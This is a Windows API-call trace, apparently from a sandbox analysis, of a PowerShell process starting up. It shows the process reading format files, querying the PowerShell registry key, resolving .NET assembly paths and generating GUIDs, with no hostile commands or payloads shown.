	[0062.427] ReadFile (in: hFile=0x2fc, lpBuffer=0x22a29d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x22a29d8*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.427] GetLastError () returned 0x0
	[0062.428] ReadFile (in: hFile=0x2fc, lpBuffer=0x22a29d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x22a29d8*, lpNumberOfBytesRead=0xae6e4*=0xfb2, lpOverlapped=0x0) returned 1
	[0062.428] GetLastError () returned 0x0
	[0062.428] ReadFile (in: hFile=0x2fc, lpBuffer=0x22a212a, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x22a212a*, lpNumberOfBytesRead=0xae6e4*=0x0, lpOverlapped=0x0) returned 1
	[0062.429] GetLastError () returned 0x0
	[0062.429] ReadFile (in: hFile=0x2fc, lpBuffer=0x22a29d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x22a29d8*, lpNumberOfBytesRead=0xae6e4*=0x0, lpOverlapped=0x0) returned 1
	[0062.429] GetLastError () returned 0x0
	[0062.429] CloseHandle (hObject=0x2fc) returned 1
	[0062.429] GetLastError () returned 0x0
	[0062.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae244, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0062.429] GetLastError () returned 0x0
	[0062.429] SetErrorMode (uMode=0x1) returned 0x1
	[0062.429] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22c3268 | out: lpFileInformation=0x22c3268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0062.429] GetLastError () returned 0x0
	[0062.429] SetErrorMode (uMode=0x1) returned 0x1
	[0062.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0062.429] GetLastError () returned 0x0
	[0062.429] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae668 | out: phkResult=0xae668*=0x2fc) returned 0x0
	[0062.430] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae6b0, lpData=0x0, lpcbData=0xae6ac*=0x0 | out: lpType=0xae6b0*=0x1, lpData=0x0, lpcbData=0xae6ac*=0x56) returned 0x0
	[0062.430] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae6b0, lpData=0x242ad0, lpcbData=0xae6ac*=0x56 | out: lpType=0xae6b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xae6ac*=0x56) returned 0x0
	[0062.430] RegCloseKey (hKey=0x2fc) returned 0x0
	[0062.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0062.430] GetLastError () returned 0x0
	[0062.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0062.430] GetLastError () returned 0x0
	[0062.432] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x534f5227, Data2=0x5924, Data3=0x4f8b, Data4=([0]=0x9f, [1]=0x5, [2]=0x25, [3]=0x27, [4]=0xb3, [5]=0xf8, [6]=0x35, [7]=0x4))) returned 0x0
	[0062.433] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x506588ca, Data2=0x4e72, Data3=0x48d5, Data4=([0]=0xbb, [1]=0xa2, [2]=0x52, [3]=0x4c, [4]=0x3c, [5]=0x4c, [6]=0x46, [7]=0x70))) returned 0x0
	[0062.433] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x2650762e, Data2=0xf0fc, Data3=0x4427, Data4=([0]=0x9e, [1]=0xa3, [2]=0xe9, [3]=0x59, [4]=0x43, [5]=0x9, [6]=0xa9, [7]=0x72))) returned 0x0
	[0062.433] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xeff8d8b7, Data2=0xdb6d, Data3=0x474c, Data4=([0]=0xaf, [1]=0xf4, [2]=0x3b, [3]=0x26, [4]=0x4f, [5]=0xf3, [6]=0x9d, [7]=0x41))) returned 0x0
	[0062.434] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x7d52f49b, Data2=0x958c, Data3=0x4584, Data4=([0]=0x9b, [1]=0x4, [2]=0x18, [3]=0xf1, [4]=0xbd, [5]=0xb9, [6]=0x80, [7]=0x2b))) returned 0x0
	[0062.434] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x2682ab07, Data2=0xd68a, Data3=0x4296, Data4=([0]=0xa1, [1]=0x53, [2]=0x62, [3]=0xfb, [4]=0xc9, [5]=0x56, [6]=0x79, [7]=0x3b))) returned 0x0
	[0062.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae17c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0062.434] GetLastError () returned 0x0
	[0062.434] SetErrorMode (uMode=0x1) returned 0x1
	[0062.434] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0062.434] GetLastError () returned 0x0
	[0062.434] GetFileType (hFile=0x2fc) returned 0x1
	[0062.435] SetErrorMode (uMode=0x1) returned 0x1
	[0062.435] GetFileType (hFile=0x2fc) returned 0x1
	[0062.435] ReadFile (in: hFile=0x2fc, lpBuffer=0x22e2c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x22e2c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.437] GetLastError () returned 0x0
	[0062.437] ReadFile (in: hFile=0x2fc, lpBuffer=0x22e2c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x22e2c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.437] GetLastError () returned 0x0
	[0062.438] ReadFile (in: hFile=0x2fc, lpBuffer=0x22e2c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x22e2c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.438] GetLastError () returned 0x0
	[0062.438] ReadFile (in: hFile=0x2fc, lpBuffer=0x22e2c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x22e2c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.438] GetLastError () returned 0x0
	[0062.439] ReadFile (in: hFile=0x2fc, lpBuffer=0x22e2c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x22e2c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.440] GetLastError () returned 0x0
	[0062.440] ReadFile (in: hFile=0x2fc, lpBuffer=0x22e2c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x22e2c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.440] GetLastError () returned 0x0
	[0062.440] ReadFile (in: hFile=0x2fc, lpBuffer=0x22e2c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x22e2c10*, lpNumberOfBytesRead=0xae6e4*=0xaca, lpOverlapped=0x0) returned 1
	[0062.440] GetLastError () returned 0x0
	[0062.440] ReadFile (in: hFile=0x2fc, lpBuffer=0x22e227a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x22e227a*, lpNumberOfBytesRead=0xae6e4*=0x0, lpOverlapped=0x0) returned 1
	[0062.440] GetLastError () returned 0x0
	[0062.440] ReadFile (in: hFile=0x2fc, lpBuffer=0x22e2c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x22e2c10*, lpNumberOfBytesRead=0xae6e4*=0x0, lpOverlapped=0x0) returned 1
	[0062.440] GetLastError () returned 0x0
	[0062.440] CloseHandle (hObject=0x2fc) returned 1
	[0062.440] GetLastError () returned 0x0
	[0062.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae244, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0062.440] GetLastError () returned 0x0
	[0062.440] SetErrorMode (uMode=0x1) returned 0x1
	[0062.441] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2303c0c | out: lpFileInformation=0x2303c0c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0062.441] GetLastError () returned 0x0
	[0062.441] SetErrorMode (uMode=0x1) returned 0x1
	[0062.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0062.441] GetLastError () returned 0x0
	[0062.441] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae668 | out: phkResult=0xae668*=0x2fc) returned 0x0
	[0062.441] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae6b0, lpData=0x0, lpcbData=0xae6ac*=0x0 | out: lpType=0xae6b0*=0x1, lpData=0x0, lpcbData=0xae6ac*=0x56) returned 0x0
	[0062.441] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae6b0, lpData=0x242ad0, lpcbData=0xae6ac*=0x56 | out: lpType=0xae6b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xae6ac*=0x56) returned 0x0
	[0062.441] RegCloseKey (hKey=0x2fc) returned 0x0
	[0062.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0062.442] GetLastError () returned 0x0
	[0062.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0062.442] GetLastError () returned 0x0
	[0062.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xaded4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a
	[0062.444] GetLastError () returned 0x0
	[0062.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xaded4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0062.446] GetLastError () returned 0x57
	[0062.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xaded4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0062.456] GetLastError () returned 0x57
	[0062.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xaded4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.471] GetLastError () returned 0x57
	[0062.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xaded4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0062.479] GetLastError () returned 0x57
	[0062.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0xaded4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0062.483] GetLastError () returned 0x57
	[0062.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0xaded4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0062.484] GetLastError () returned 0x57
	[0062.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xaded4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0062.485] GetLastError () returned 0x57
	[0062.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0xaded4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0062.487] GetLastError () returned 0x57
	[0062.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xaded4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0062.488] GetLastError () returned 0x57
	[0062.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xaded4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0062.489] GetLastError () returned 0x57
	[0062.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xaded4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0062.491] GetLastError () returned 0x57
	[0062.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0xaded4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0062.492] GetLastError () returned 0x57
	[0062.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0xaded4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0062.493] GetLastError () returned 0x57
	[0062.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0xaded4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0062.494] GetLastError () returned 0x57
	[0062.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xaded4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a
	[0062.496] GetLastError () returned 0x57
	[0062.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xaded4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0062.496] GetLastError () returned 0x57
	[0062.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xaded4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0062.496] GetLastError () returned 0x57
	[0062.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xaded4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.496] GetLastError () returned 0x57
	[0062.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.497] GetLastError () returned 0x57
	[0062.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.497] GetLastError () returned 0x57
	[0062.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.497] GetLastError () returned 0x57
	[0062.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.497] GetLastError () returned 0x57
	[0062.536] VirtualQuery (in: lpAddress=0xad3c0, lpBuffer=0xae3c0, dwLength=0x1c | out: lpBuffer=0xae3c0*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.536] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x28d210e2, Data2=0xdd98, Data3=0x48d7, Data4=([0]=0xb0, [1]=0xc3, [2]=0x59, [3]=0xf4, [4]=0xcf, [5]=0xce, [6]=0xaf, [7]=0x17))) returned 0x0
	[0062.537] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xe78a251e, Data2=0xf941, Data3=0x4b1c, Data4=([0]=0xbe, [1]=0x3f, [2]=0x71, [3]=0x7a, [4]=0x87, [5]=0xd8, [6]=0x20, [7]=0x9a))) returned 0x0
	[0062.537] VirtualQuery (in: lpAddress=0xad438, lpBuffer=0xae438, dwLength=0x1c | out: lpBuffer=0xae438*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.538] VirtualQuery (in: lpAddress=0xad438, lpBuffer=0xae438, dwLength=0x1c | out: lpBuffer=0xae438*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.538] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x7cf97426, Data2=0x222c, Data3=0x4772, Data4=([0]=0x95, [1]=0xa7, [2]=0x58, [3]=0xe, [4]=0xb8, [5]=0xc9, [6]=0x51, [7]=0x33))) returned 0x0
	[0062.540] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x299d59d2, Data2=0xb80c, Data3=0x44f4, Data4=([0]=0x8b, [1]=0x35, [2]=0x12, [3]=0x11, [4]=0xc1, [5]=0x49, [6]=0x3c, [7]=0x27))) returned 0x0
	[0062.540] VirtualQuery (in: lpAddress=0xad564, lpBuffer=0xae564, dwLength=0x1c | out: lpBuffer=0xae564*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.541] VirtualQuery (in: lpAddress=0xad410, lpBuffer=0xae410, dwLength=0x1c | out: lpBuffer=0xae410*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.541] VirtualQuery (in: lpAddress=0xad410, lpBuffer=0xae410, dwLength=0x1c | out: lpBuffer=0xae410*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.541] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xfad2516c, Data2=0xf1f1, Data3=0x4e57, Data4=([0]=0xad, [1]=0x1e, [2]=0xdf, [3]=0xdd, [4]=0xaf, [5]=0xed, [6]=0x5b, [7]=0x8f))) returned 0x0
	[0062.541] VirtualQuery (in: lpAddress=0xad564, lpBuffer=0xae564, dwLength=0x1c | out: lpBuffer=0xae564*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.542] VirtualQuery (in: lpAddress=0xad47c, lpBuffer=0xae47c, dwLength=0x1c | out: lpBuffer=0xae47c*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.542] VirtualQuery (in: lpAddress=0xad130, lpBuffer=0xae130, dwLength=0x1c | out: lpBuffer=0xae130*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
